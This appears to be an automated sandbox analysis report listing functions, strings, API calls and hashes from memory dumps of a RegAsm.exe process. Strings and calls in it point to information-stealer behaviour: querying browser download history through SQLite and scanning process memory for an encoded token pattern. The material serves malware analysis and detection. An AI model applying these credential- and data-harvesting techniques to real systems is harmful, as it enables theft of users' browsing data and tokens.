Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f000d6eafa93d16b44d4561eb70b5730d7693c166b8ecd957d0c3e6a9934496
Instruction ID: 9d0dc15c47f6feb26048bc534bf324c03db852ee27cf263c6d2d49f5ac103ebc
Opcode Fuzzy Hash: 2f000d6eafa93d16b44d4561eb70b5730d7693c166b8ecd957d0c3e6a9934496
Instruction Fuzzy Hash: 5711E9FD8041007FD6049B28EC41E7B7769FF91700FD8949CF84A87250E736EA59D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 199573E0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 369COMMON

Download Yara Rule

Strings

ase, xrefs: 1995768D
YHI;, xrefs: 199573E3
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 1995776D
sqlite_temp_master, xrefs: 199573F2
sqlite_master, xrefs: 199573FD

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT*FROM"%w".%s ORDER BY rowid$YHI;$ase$sqlite_master$sqlite_temp_master
API String ID: 0-3745289582
Opcode ID: 1a5c74c2c6ff7d34f0bb6faae27ca6a7d5f943ae25d30c534cdec7b81a7cdfc0
Instruction ID: 99bc632a42f74721a7c8787101b674280f1be0ad1ba84a6c79c8045afe24d04b
Opcode Fuzzy Hash: 1a5c74c2c6ff7d34f0bb6faae27ca6a7d5f943ae25d30c534cdec7b81a7cdfc0
Instruction Fuzzy Hash: D8E1D7B09043419FF711CF28C880B5FBBE8BF55704F08851EE98A97291E771EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19897920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: 6a5b42347c377f844ade1d3a6e90b08039ce53e7bfde0da0af70a8f05f339440
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: 7AB1CDB1A14202AFC704EF28CC81A5ABBE5FF88218F48553DF949D3751E735F9648BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00407463 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407468

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

lstrlen.KERNEL32(00000000), ref: 00407734
lstrlen.KERNEL32(00000000), ref: 00407748

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

Downloads, xrefs: 0040751B
Downloads, xrefs: 00407498
SELECT target_path, tab_url from downloads, xrefs: 00407605

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 3193997572-2241552939
Opcode ID: 01ee42162ddfd50fec33091134fdbbdd2ca3b20a03df9997f96aea91f515be5b
Instruction ID: d481aeb2630c3422184040b81c8f5da9760357faf1dbb8ec19a062efdad72ec8
Opcode Fuzzy Hash: 01ee42162ddfd50fec33091134fdbbdd2ca3b20a03df9997f96aea91f515be5b
Instruction Fuzzy Hash: A3B15531804248EADB09EBE6D955BDDBBB4AF18308F54446EF405732C2DF782B18DB26

Uniqueness

Uniqueness Score: -1.00%

Function 19835930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

simple, xrefs: 19835A38, 19835A84, 19835A95, 19835B27
unknown tokenizer: %s, xrefs: 19835B28
CREATE TABLE x(input, token, start, end, position), xrefs: 19835933

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: 8f58d2d9861a0595b98414d06d35133b21da4c66652b34318d145dd52d8bde7c
Instruction ID: 54ed9e5581bd2a2210530aaa6c6725b9638b8c7c3cb0b729aec98e56c1531b80
Opcode Fuzzy Hash: 8f58d2d9861a0595b98414d06d35133b21da4c66652b34318d145dd52d8bde7c
Instruction Fuzzy Hash: A871CE719043468FCB00CF28C884A5AB7E8BF94255F8D452DEC5DD7241EB35EA4ACBE2

Uniqueness

Uniqueness Score: -1.00%

Function 1993F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1993F1DC, 1993F31D
misuse, xrefs: 1993F1E6, 1993F327
%s at line %d of [%.10s], xrefs: 1993F1EB, 1993F32C
unable to delete/modify user-function due to active statements, xrefs: 1993F157, 1993F298

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: f8169611d4be9089dc4c839d0badfdca9b24abd2547aefda5d1aafd91c72fffb
Instruction ID: 9b7d1fc43695ee793811ea5cc36f19c5783137a324da6986d492f2723090d8f3
Opcode Fuzzy Hash: f8169611d4be9089dc4c839d0badfdca9b24abd2547aefda5d1aafd91c72fffb
Instruction Fuzzy Hash: C96189B5600B01ABF7028F35DC41B977798AF41706F8C412CE8D99B6C2E7A6E29487A1

Uniqueness

Uniqueness Score: -1.00%

Function 198509C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 19850B3B

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
API String ID: 0-2869280805
Opcode ID: 3cb9bcb7fdaa6bac59cbdbf6f423eed04041b5a96fcfdb2fbfe3628aafd61941
Instruction ID: a0a00b8b29b54cd2a2cd01eaedcdb53be6b0a8ac814546a30a2e3088ab555cda
Opcode Fuzzy Hash: 3cb9bcb7fdaa6bac59cbdbf6f423eed04041b5a96fcfdb2fbfe3628aafd61941
Instruction Fuzzy Hash: AA41F47A7013019FE700AF58EC80966F3E4FF94225B0845BEF64A87751E732E859C791

Uniqueness

Uniqueness Score: -1.00%

Function 19843F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

remove_diacritics=1, xrefs: 19843FA2
tokenchars=, xrefs: 1984406A
remove_diacritics=2, xrefs: 19844021
separators=, xrefs: 198440A3
remove_diacritics=0, xrefs: 19843FE1

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: ef133dc2855b84e0d27dbb0ffaeee32883b920245d4d53d0b10f35571079d8d0
Instruction ID: bc1ec51e474515c94c757a7ffbe0b1ff7dc7fe77da4126dcc45eb18ce4ff4f81
Opcode Fuzzy Hash: ef133dc2855b84e0d27dbb0ffaeee32883b920245d4d53d0b10f35571079d8d0
Instruction Fuzzy Hash: B651287660428A8BD300CF28D841776B7F1FF61B24FAC41ADE8469B685D732ED86CB51

Uniqueness

Uniqueness Score: -1.00%

Function 19841120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

main, xrefs: 198411A6
rbu_memory, xrefs: 198411F5

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: 1be8bb3c7bbc48429d820de15f758f424a4ac34e2ba577f8b6f79bf7a8e239f1
Instruction ID: fb571a88002984119145b71d13cf781da6261c1b42c9f269e58e1c86ce2b3f31
Opcode Fuzzy Hash: 1be8bb3c7bbc48429d820de15f758f424a4ac34e2ba577f8b6f79bf7a8e239f1
Instruction Fuzzy Hash: D451D0757003159FD700CF69D880B6AB3E8BFA5314F28402EEC49D7690DB35E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19949350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4077ba0946fb49bdc662dbe2aabd8bee206286afbb7a7b694d5bc4cd47ee9571
Instruction ID: c8b6a9e42912f79f4dce622215f7a78964302b20f5a24dd9b82c1cff844bae59
Opcode Fuzzy Hash: 4077ba0946fb49bdc662dbe2aabd8bee206286afbb7a7b694d5bc4cd47ee9571
Instruction Fuzzy Hash: A65150B0500271DFD7125B7DDE8CA1637BCBF04B45B1A5028EC4AD3191DB35E95ECAA2

Uniqueness

Uniqueness Score: -1.00%

Function 198D15C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

null, xrefs: 198D15EE
JSON cannot hold BLOB values, xrefs: 198D16D9
%!0.15g, xrefs: 198D160A

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 03dba959a2c9cedb7f86f4d7bdb539a31c901951e260187076b40c4dc6ea7a46
Instruction ID: 34f0a97764a524fdb257e247f76c274b53d954fbb4a2193bc68c298b4e9c4b80
Opcode Fuzzy Hash: 03dba959a2c9cedb7f86f4d7bdb539a31c901951e260187076b40c4dc6ea7a46
Instruction Fuzzy Hash: 34417BB5A047006BE3149B58FC82BAA77E4FF51329F0C452DF551C25D2D3AAA59883E2

Uniqueness

Uniqueness Score: -1.00%

Function 19841D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 19841E2C
no such database: %s, xrefs: 19841E05

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: 4d53c381c1f2d5aa5ab4b02733377ebda468657e0103e6ab2893c091be0c8bfe
Instruction ID: 4ff1eaadd1832e312bb625cb217e03b6d61488b29cdd4e7d4f28a31bf352312e
Opcode Fuzzy Hash: 4d53c381c1f2d5aa5ab4b02733377ebda468657e0103e6ab2893c091be0c8bfe
Instruction Fuzzy Hash: E73121BA70030D6BC3105FA9CC00B6BB7D8FF95225F88417DF9589B241EA7AE90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8D9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040D8ED
??_U@YAPAXI@Z.MSVCRT ref: 0040D90E

Part of subcall function 0040D727: strlen.MSVCRT ref: 0040D733
Part of subcall function 0040D727: strlen.MSVCRT ref: 0040D749
Part of subcall function 0040D727: strlen.MSVCRT ref: 0040D7E2

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040D93B
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040DA05
??_V@YAXPAX@Z.MSVCRT ref: 0040DA16

Strings

@, xrefs: 0040D954

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtual
String ID: @
API String ID: 3099930812-2766056989
Opcode ID: e4964f2df1008eb0ee9e1ca68b90a3f04829a9b14becb9e4934092ad6d31146c
Instruction ID: 822ec094d55a4208c2755145bcec9d607f6c05e83d8da933b23198d366d7e4e4
Opcode Fuzzy Hash: e4964f2df1008eb0ee9e1ca68b90a3f04829a9b14becb9e4934092ad6d31146c
Instruction Fuzzy Hash: 01416972E00109AFEF14DFA5CD41AEE7BB6EB44354F14802AF905B2290D7789E549BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF70 Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FF75
strtok_s.MSVCRT ref: 0040FFA0
StrCmpCA.SHLWAPI(00000000,0042445C,00000000,?,?,?,00000000), ref: 0040FFE3
StrCmpCA.SHLWAPI(00000000,00424458,00000000,?,?,?,00000000), ref: 00410011
StrCmpCA.SHLWAPI(00000000,00424454,00000000,?,?,?,00000000), ref: 00410036
StrCmpCA.SHLWAPI(00000000,00424450,00000000,?,?,?,00000000), ref: 00410067
strtok_s.MSVCRT ref: 0041009D

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
